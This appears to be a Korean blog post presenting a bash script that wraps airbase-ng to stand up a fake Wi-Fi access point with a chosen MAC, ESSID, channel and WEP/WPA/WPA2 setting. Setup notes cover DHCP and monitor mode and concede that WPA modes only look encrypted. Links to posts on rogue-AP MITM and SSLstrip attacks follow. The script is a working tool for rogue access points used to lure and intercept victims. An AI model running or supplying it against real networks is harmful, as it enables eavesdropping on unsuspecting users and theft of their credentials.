### Fake Access Point ### with encryption
### WEP / WPA / OPN ###
### arguments ###
## $1 = MAC ADDRESS
## $2 = ESSID
## $3 = channel
## $4 = monitoring interface [mon0, mon1.....]
## $5 = Encryption type [ WEP, WPA, WPA2 ]
## $6 = password
#!/bin/bash
WEP='-w'
password=$6
WPA='-w '$password' -z 2'
WPA2='-w '$password' -Z 4'
if [ $5 == WEP ]; then
airbase-ng -a $1 -e $2 -c $3 $4 $WEP $6
elif [ $5 == WPA ]; then
airbase-ng -a $1 -e $2 -c $3 $4 $WPA
elif [ $5 == WPA2 ]; then
airbase-ng -a $1 -e $2 -c $3 $4 $WPA2
else
airbase-ng -a $1 -e $2 -c $3 $4
fi
script 파일 (.sh)
# 환경 및 조건
1. DHCP 서버 구축
2. 무선 랜 인터페이스의 모니터링 모드 활성화 ( airmon-ng )
3. read 구문이 없으므로 ./filename.sh arg1 arg2 arg3... 으로 실행
4. WEP는 DHCP까지 정상작동
5. WPA, WPA2는 비밀번호 오류 즉, 겉으로만 암호화 된 것 처럼 보임
( 어디까지나 airbase-ng 의 한계이자 내가 풀어야할 숙제 )
'IT > Script' 카테고리의 다른 글
[JS]focus, blur를 이용한 동적 타이틀 만들기 (0) | 2019.04.04 |
---|---|
무선 네트워크 해킹 툴 [ WiPhire Script ] (0) | 2015.02.16 |
FAKE AP 생성과 MITM / SSL strip 공격 (0) | 2015.01.05 |
Rogue AP + SSLStrip 쉘스크립트 [ Fake AP, MITM 공격 ] (0) | 2015.01.05 |